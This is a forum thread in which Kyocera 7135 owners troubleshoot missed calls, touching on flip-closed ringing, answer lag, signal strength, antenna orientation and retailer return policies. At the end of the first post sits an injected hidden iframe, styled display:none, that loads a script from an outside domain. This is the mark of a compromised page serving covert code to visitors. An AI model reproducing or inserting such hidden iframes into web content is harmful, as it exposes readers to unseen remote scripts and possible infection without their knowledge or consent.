+ Reply to Thread
Page 1 of 2 1 2 LastLast

Not receiving phone calls

I have a strange problem. My 7135 works fine when I have the flip opened but when I have it closed, phone doesn't ring... Same thing if I just turn off the Palm by pressing the backlit button. When the flip is closed, it doesn't ring and I don't get any indication I missed a call afterwards either. If the person calling left me a message, I get notification when I open the flip that I have a message. Also it doesn't seem to happen when the phone is plug in.

Any one seen this? Is there some setting I messed up?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

phone calls

I have been having the issue of one ring then going to missed call. I also get no rings and then get a voice mail notificaiton.

I have had my PRL changed by Alltel to see if that helps but I still have the same issue just not as frequent.
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

Administrator
    have you always had this problem? how is the signal strength in your area? if you are in a fringe area location, you could be missing calls because of that...

Re: phone calls

Originally posted by GREGHARKINS
    I have been having the issue of one ring then going to missed call. I also get no rings and then get a voice mail notificaiton.

I have had my PRL changed by Alltel to see if that helps but I still have the same issue just not as frequent.
    Curious about the same questions as marctronixx: This sounds exactly like what happens to me on my StarTac with VZW all too often. I've always blamed the network for it, as it started happening when they upgraded my area to digital, and I often have variable digital signal strength at my house. Sometimes it also seems like it takes the system longer to "find me" initially, as a second call to me from the same person, with my phone in the same place, usually rings immediately. I now tell people to try me twice. A call in after I have made a call out also rings immediately. And sometimes, someone will leave me a voicemail, an hour or so will go by, I will make a call out, and all of a sudden get my voicemail notification, as if the system just noticed me when I called out. I'm not sure what phone/tower finding algorithm is messing up, but I think one is. Since you are on Alltel, you may have something completely different going on, or the systems may be all too similar! :eyesroll

Issue: R U missing calls due to the 7135?

I am now on my second 7135 phone. I have the following occasional problem: On an incoming call, the 7135 is hunting for the name in the database and even when it finds it , I cannot answer the call. When I depress the answer key, nothing happens until the call is missed. The keystrokes which I had hit in attempting to answer then prompt the phone to dial back the caller ID number. This happens in about 1 in 5-10 calls. Verizon in southern cal claims that they cannot extend cut-over to Octel voicemail past 4 rings, so time is very short in which to answer the call.

At first, I thought it was a hardware problem. I called Kyo and the good folks there asked me to remove Launcher III. I did and still the problem persisted. So I requested and received an RMA. Same problem on the new 7135.

I am using category ringers with custom MP3 ringers now but it happened even without category ringing. There are no other intrusive Palm programs (Datebk5, etc). I have over 1000 contacts in my Palm database. The phone is not set to answer on opening the flip. This was never a problem with the 6035.

Are other users seeing this problem? Suggestions?

I've had this problem for some time and thought I was the only one. Since I have so many programs and system extensions installed, I figured that my configuration was the culprit. (I have no custom MP3 ringers. )

As you reported, it happens in about 1 in 5-10 calls so I just quickly call back those calls I miss. Thanks for reporting this.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

I get this too. I believe it is part of the more general "lag" problem that some are experiencing (including me). That is, sometimes when opening the flip, everything is just frozen for a few seconds before working fine. If it happens to happen at an incoming call, nothing will allow the call to be answered, and it is missed. This is the *one* thing that is really bugging me about the phone (no pun intended). I absolutely cannot figure out what it is. I'm hoping a firmware update from verizon down the pike may fix it, otherwise, may need to return it for a new phone...

I very occasionally get this too. It is the only real problem I have had with my phone (I have only had one reverse screen lockup, and I was pretty much abusing the phone at the time, jumping from app to app, making and breaking data connections, etc...).

I THINK I have narrowed this down to when I have gone back and forth from audible to vibrate mode several times, it will eventually start doing this. It very very occasionally gets worse were the phone will stop ringing at all on new calls, and I can't complete an outbound call (just hangs as if it is dialing, but never dials). I have found when it is in this state the signal strength shows an unchanging four bars in areas were I NEVER have that strong a signal. A soft reset usually brings it back, although occasionally I need to pull the battery for a few seconds (not long enough to trigger a hard reset). I suspect this is the actual reason for VZW's delayed release and expect that it will be fixed in a firmware upgrade.

I have gotten into the habit of doing a soft reset once a day when I think of it, and I have only had this happen once in the two weeks I have been doing that (on the way home from the DC Kyo Krazy meeting actually....). I need to write an automatic soft reset program to trigger after my daily backup is done (one probably exists already)

Alan

7135 going back to GetConnected

I really like this phone, but unfortunately one unforeseen problem is causing me to return it.

The reception while on my belt clip is very poor. I noticed this yesterday when I got about 4 missed calls (I know because I got voice mails and never received the call), but I figured more testing was in order. So this morning I have confirmed my suspicions that this phone does not work as good as my Mot T720. I have both phones side by side in 3 different locations with weak signal coverage and the T720 would ring every time while the 7135 would do nothing. I could extend the antenna of the 7135 and it would work about 70% of time. Since voice communication (mainly incoming) is my primary reasons for using a cell phone, this will not work for me.

Anyone else experience this? I have had similar experiences with other Kyo phones in the past.

I have noticed that the signal strength with the 7135 is a little less than with my T720. However, I do not think i have been mising calls as a result.

Here is one thought. How did you wear the 720 on your belt? With the antenna pointing up and down or horizontally?

The reason I ask is that I find it most comfortable to wear the 7135 in the horizontal position. While this is more comfortable, it is not necessarily best for reception. All of the cellular towers I have seen have antennas that are vertically polarized. That is to say they are vertical antennas. When you wear the 7135 on your belt horizontally, the antenna in the phone is horizontally polarized. What you have there is a cross-polarization. This can lead to a good deal of signal loss, especially when you are dealing with low power in the 800mhz-1900mhz range.

This could be a reason why your reception is not as great when on the belt. Just a thought.

Re: 7135 going back to GetConnected

Originally posted by jameskk
    ...The reception while on my belt clip is very poor. I noticed this yesterday when I got about 4 missed calls (I know because I got voice mails and never received the call), but I figured more testing was in order. So this morning I have confirmed my suspicions that this phone does not work as good as my Mot T720. ...
    I have had the phone for over a month and have informally judged the 7135 against my wife's Nokia and my son's T720 and they seem to handle signals about the same. Most of the time, where I experience dead spot, so do they and if they can get signal so can I. One thing I have noticed is that the signal strength bars vary quite a bit as I move around, something I didn't notice with my old StarTac. But, even if no bars show, as long as the antenna icon is showing, I can receive and send calls. One other observation I have made is that the 7135 seems to be very sensitive to placement relative to the body. If I hold the phone with my hand cupping the antenna, I lose one or two bars of strength. However, it has no problems in the belt clip.

Actually, I wear the 7135 in a vertical position, while I wear the T720 horizontal.

There goes that theory. ha ha ha

UPDATE - since posting my original message this morning, I had lost about 5 calls (3 voice mails and 1 person telling me he called twice without an answer).. so I contacted GetConnected about the return and noticed on the enclosed return policy sheet that the phone cannot have over 30 min. talk time on it.. heck, I had 30 min. on the phone after the first 2 or 3 calls I made. Does anyone know if this policy is enforced by GetConnected or how I can reset the call timers?

I don't want to be stuck with a $700 phone that won't work.

I have had my 7135 for over a week now, and I have not missed any calls because of signal strength (with my Sprint Treo I missed 9 out of 10 while sitting at my desk, and the one I would get would get dropped quickly). With the 7135 I have only had to even use the antenna a couple times in several hours worth of driving conversations. I don't have another Verizon phone to compare directly with, but I have had no reception problems at all.
    Please visit my picture site: Robert-O-Rama :)

Originally posted by jameskk
    UPDATE - since posting my original message this morning, I had lost about 5 calls (3 voice mails and 1 person telling me he called twice without an answer).. so I contacted GetConnected about the return and noticed on the enclosed return policy sheet that the phone cannot have over 30 min. talk time on it.. heck, I had 30 min. on the phone after the first 2 or 3 calls I made. Does anyone know if this policy is enforced by GetConnected or how I can reset the call timers?
    I thought people with problem 7135s were returning them directly to Kyocera? Give Kyocera a call and tell them the problem and see if they can swap it for you.

Jameskk, too bad about having trouble with your new phone! Are you on Alltel or Verizon? And if Verizon particularly, but I guess either way, did you or a tech update your PRL when it was activated? Could it be that your 7135 doesn't know about good towers nearby and is losing signal because of it?

There is a 30 day exchange w/Get Connected but you do have the restocking fee if you need to return it. After the 30 days, your warranty is with Kyocera unless you used an American Express card which gives you more alternatives.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

I too have had NO reception problems with my 7135. I keep mine in my front pants pocket most of the time.
    ~'kito
    pdaPhoneHome Moderator

What are the additional alternatives with Amex?